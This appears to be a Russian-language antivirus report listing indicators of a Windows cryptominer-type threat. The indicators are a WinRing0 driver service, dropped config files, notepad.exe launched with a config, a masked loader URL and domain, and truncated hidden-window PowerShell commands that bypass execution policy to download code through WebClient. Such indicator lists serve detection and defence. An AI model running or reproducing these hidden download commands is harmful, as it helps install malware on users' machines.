Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%WINDIR%\WinRing0x64.sys'
- 'WinRing0_1_2_0' %WINDIR%\WinRing0x64.sys
- %WINDIR%\notepad.exe
- iexplore.exe
- %ALLUSERSPROFILE%\zckikinbzt\083626eddd_3.1.0
- %ALLUSERSPROFILE%\zckikinbzt\cfgi
- %ALLUSERSPROFILE%\zckikinbzt\cfg
- http://13#.#81.34.1/min3/loader23435345465446.jpg
- DNS ASK pa###bin.com
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...' (со скрытым окном)
- '%WINDIR%\syswow64\wscript.exe' "<PATH_SAMPLE>.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\notepad.exe' -c "%ALLUSERSPROFILE%\zCKIkINbzT\cfg"